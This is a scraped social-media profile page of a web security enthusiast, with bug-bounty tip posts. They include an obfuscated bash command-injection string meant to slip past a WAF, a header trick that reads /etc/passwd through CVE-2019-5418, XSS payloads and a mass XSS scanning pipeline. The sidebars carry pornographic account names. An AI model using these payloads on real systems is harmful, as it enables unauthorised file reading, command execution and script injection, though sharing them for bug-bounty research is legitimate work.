Olivia
Online
Rodric
@rodricbr_
23 years old | Cyber Security Enthusiast | Web App. Security Researcher | Shell/Bash Script Programmer | π§π· (::1)
::1
Joined November 2014
265 Following
18 Followers
85 Posts
@DualVoidAnima So you're the one that made it, it looks awesome... I've seen this as a gif format on countless comments on instagram
@sirifu4k1 Thanks!
After a fascinating Command Injection publication from @sirifu4k1 few weeks ago, I decided to do a little "video demonstration & explanation" on how to bypass WAF using bash witch craft.
https://t.co/OvdQebN3rv
If there's anything I'm doing wrong or missing, please let me know!
Who to follow
xandsz
@xandsz__
Bug Hunter | Hacking | 5x CVE π§π· https://t.co/AVdQJgXDUh https://t.co/zlJ0CT8yrq https://t.co/4tROLFkg9A https://t.co/pv1n69PViu
Saif Abdullah Khan Mahi π§π©
@badhacker0x1
Just another servant of Allah | A bug bounty hunter| Junior Knight at @kn16h75qu4d.
Sir. Zeus
@Eyhuss1
β’ Retired hacker
@sirifu4k1 by wrapping it with brace expansion you can use a "," as "spaces" to the command
${!##\-}<<<{\$\'\\$(($((1<<1))#10100101))\\$(($((1<<1))#10011100))\\$(($((1<<1))#10001101))\\$(($((1<<1))#10011011))\\$(($((1<<1))#10010001))\',\$\'\\$(($((1<<1))#110111))\\$(($((1<<1))#10001101))\'}
My 2nd RoR 'CVE-2019-5418' LFI in last 15 days. This is 3 years old bug and still exists... The page gives 404, but the buggy app is still in the server running.
Add "Accept: ../../../../../../../../etc/passwd{{" to GET Request and read /etc/passwd #bugbountytips #BugBounty
I've recently made my first write-up on Medium, telling the story of how I managed to manually find an Open Redirect and then escalating it to a XSS. If you're interested in reading it, check out the link below:
.
https://t.co/0wJuVuvFdr
.
.
.
.
#bugbountytips #BugBounty #medium
@_2os5 It was on a change username input
Stored XSS on 'value' attribute. (html input)
Payload used:
&quot;&gt;<svg onmouseover=confirm(document.domain)>
.
.
.
.
#bugbountytips #bugbounty
@Biack1st time to use rust lang instead
Testing XSS using 'CSRF PoC Generator' on Burp Professional
Also useful to create a video explaining a XSS vulnerability you've found
.
.
.
.
#burptips #bugbountytips #burpsuite
@Kashhad10 Yeah, this one
airixss's virtue
@skothastad
.
.
.
Program: https://t.co/wNBmMHB8t6
#bugbountytips #bugbounty #hackerone
@Kashhad10 Sorry for the late answer, but here it is:
cat alive-subdomains.txt | waybackurls | nilo | uro | qsreplace '"><svg onload=confirm(1)>' | airixss -payload 'confirm(1)'
Or you could use it with gau or gauplus, instead of waybackurls.
Usefull tip to fuzzers:
- Adding a "/FUZZ" at the end of the line of a given file
$ cat subdomains.txt | sed 's/.*/&\/FUZZ/'
- Note: It's going to also add a "/", if you don't want to, just use the following instead: sed 's/.*/&FUZZ/'
#bugbountytips #BugBounty #hackerone
xss leading to ssrf
@RenegadeRanting @PPathole @elonmusk Sure, being watched and monitorized by your own country, and every action that they deny fks you up, sounds good to me :)
@LM_loleris this is the mad murderer, the classic one from 2014, I hope you're back with it
@yomama28234517 @PuppyYokai @BemmerWhite @SmutKari I have no fucking idea, every day something new and worse, lol
@AgendaFreeTV You can barely see but, there's like little white dots at the edges of the pillar, seems that it was jointed together using 'nails', i would say that it is hollow
Last Seen Users on Sotwe
Incest ( ΰΈΰΉΰΈΰΈΰΈΰΈ΅ΰΉΰΈ‘ΰΈ΅ΰΉΰΈΰΉΰΈΰΈΰΉΰΈΰΉ )
Seen from Indonesia
Roberta Daniela
Pns Indo Hot 
Seen from Turkey
AxelAlvarez
Seen from Colombia
Meme hastasi
Nyong papua
Seen from Indonesia
Non Non
Seen from Italy
BustyBritMILF
Seen from United Kingdom
Sandra Agustina
Seen from Singapore
F@ntastic porno π
Seen from Germany
Trends for you
Most Popular Users
Elon Musk
@elonmusk
240.4M followers
Barack Obama
@barackobama
119.3M followers
Donald J. Trump
@realdonaldtrump
111.7M followers
Cristiano Ronaldo
@cristiano
110M followers
Narendra Modi
@narendramodi
107M followers
Rihanna
@rihanna
97.5M followers
NASA
@nasa
92.1M followers
Justin Bieber
@justinbieber
90.8M followers
KATY PERRY
@katyperry
87.4M followers
Taylor Swift
@taylorswift13
81.2M followers
Lady Gaga
@ladygaga
72.8M followers
Kim Kardashian
@kimkardashian
69.7M followers
Virat Kohli
@imvkohli
69.5M followers
YouTube
@youtube
68.7M followers
Bill Gates
@billgates
63.7M followers
The Ellen Show
@theellenshow
62.5M followers
Neymar Jr
@neymarjr
62.2M followers
CNN
@cnn
61.9M followers
X
@x
60.8M followers
Selena Gomez
@selenagomez
60.5M followers